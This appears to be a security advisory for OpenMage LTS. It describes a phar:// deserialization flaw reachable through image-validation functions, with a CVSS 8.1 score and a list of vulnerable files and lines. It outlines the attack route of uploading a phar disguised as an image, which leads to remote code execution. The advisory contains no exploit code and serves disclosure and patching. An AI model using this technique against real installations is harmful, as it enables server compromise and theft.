PHP functions such as getimagesize(), file_exists(), and is_readable() can trigger deserialization when processing phar:// stream wrapper paths. OpenMage LTS uses these functions with potentially controllable file paths during image validation and media handling. An attacker who can upload a malicious phar file (disguised as an image) and trigger one of these functions with a phar:// path can achieve arbitrary code execution.
| Metric | Value | Justification | | ------------------------ | --------- | ------------------------------------------------ | | Attack Vector (AV) | Network | Exploitable via file upload and web requests | | Attack Complexity (AC) | High | Requires file upload + triggering phar:// access | | Privileges Required (PR) | None | Some upload vectors don't require authentication | | User Interaction (UI) | None | Exploitation is automatic once triggered | | Scope (S) | Unchanged | Impacts the vulnerable component | | Confidentiality (C) | High | Full system access via RCE | | Integrity (I) | High | Arbitrary code execution | | Availability (A) | High | Complete system compromise possible |
| File | Line | Vulnerable Function |
| --------------------------------------------------------- | ---- | ---------------------------------------------- |
| app/code/core/Mage/Core/Model/File/Validator/Image.php | 72 | getimagesize($filePath) |
| app/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php | 137 | getimagesize($item->getFilename()) |
| lib/Varien/Image.php...
20.17.0Exploitability
AV:NAC:HPR:NUI:NScope
S:UImpact
C:HI:HA:H8.1/CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H